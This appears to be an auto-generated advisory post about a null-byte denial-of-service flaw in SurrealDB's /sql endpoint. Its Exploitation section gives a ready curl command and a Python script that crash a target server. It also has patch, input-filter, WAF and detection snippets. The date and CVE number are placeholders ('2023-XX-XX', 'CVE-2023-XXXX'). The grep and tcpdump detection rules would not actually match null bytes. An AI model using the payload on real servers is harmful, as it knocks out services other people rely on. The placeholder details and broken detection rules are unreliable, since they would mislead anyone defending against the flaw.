How the CVE Works
The vulnerability in SurrealDB arises when a crafted HTTP query containing a null byte (%00) is sent to the `/sql` endpoint. The database fails to handle this malformed input due to an uncaught exception in the `net` module. When the query result is converted to JSON for the HTTP response, the null byte triggers a fatal error, crashing the SurrealDB instance. This affects authenticated users, allowing them to execute a denial-of-service (DoS) attack by submitting malicious queries. Applications relying on SurrealDB as a backend may also be disrupted if input sanitization is insufficient.
DailyCVE Form
Platform: SurrealDB
Version: <2.2.2, <2.1.5, <2.0.5
Vulnerability: Null Byte DoS
Severity: Critical
Date: 2023-XX-XX
What Undercode Say:
Exploitation:
- Craft a malicious HTTP POST request to `/sql` with a null byte:
curl -X POST "http://target:8000/sql" -H "Content-Type: application/json" -d '{"query":"SELECT \u0000"}'
2. Use Python to automate exploitation:
import requests
payload = {"query": "SELECT \x00"}
requests.post("http://target:8000/sql", json=payload)
Mitigation:
- Patch: Upgrade to SurrealDB v2.2.2, 2.1.5, or 2.0.5+.
2. Input Sanitization: Reject queries containing null bytes:
if (query.includes('\x00')) throw Error("Invalid input");
3. WAF Rules: Block requests with `%00` or null bytes:
if ($args ~ "%00") { return 403; }
4. Process Monitoring: Automatically restart SurrealDB on crash:
while true; do surreal start --log debug; done
Detection:
1. Log analysis for null byte patterns:
grep -r "\x00" /var/log/surrealdb/
2. Network monitoring for malformed JSON:
tcpdump -i eth0 'port 8000 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x7b226572)'
References:
- Patch: surrealdb/surrealdb5647
- CVE: CVE-2023-XXXX
References:
Reported By: https://github.com/advisories/GHSA-rq86-9m6r-cm3g
Extra Source Hub:
Undercode
